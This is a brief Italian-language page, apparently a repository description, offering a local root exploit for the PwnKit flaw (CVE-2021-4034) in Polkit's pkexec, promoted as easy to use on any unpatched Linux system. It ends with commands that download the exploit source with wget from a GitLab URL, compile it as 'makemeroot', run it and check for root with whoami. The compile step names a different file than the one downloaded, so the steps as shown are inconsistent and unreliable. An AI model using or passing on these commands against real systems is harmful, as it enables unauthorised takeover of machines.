
Esploit di escalation dei privilegi locali per CVE-2021-4034 (PWNKIT) che prende di mira pkexec di Polkit, consentendo agli utenti non privilegiati di ottenere i privilegi di root su sistemi Linux vulnerabili.
CVE-2021-4034 (PWNKIT)
Una vulnerabilità di corruzione della memoria in pkexec di Polkit, che consente a qualsiasi utente non privilegiato di ottenere pieni privilegi di root su un sistema vulnerabile utilizzando la configurazione predefinita di polkit.
Facile da usare, escalation dei privilegi locale su qualsiasi sistema linux non patchato.
wget https://gitlab.com/nelox/pwnkit-vulnerability/blasty-vs-pkexec.c
gcc bblasty-vs-pkexec.c -o makemeroot
./makemeroot
whoami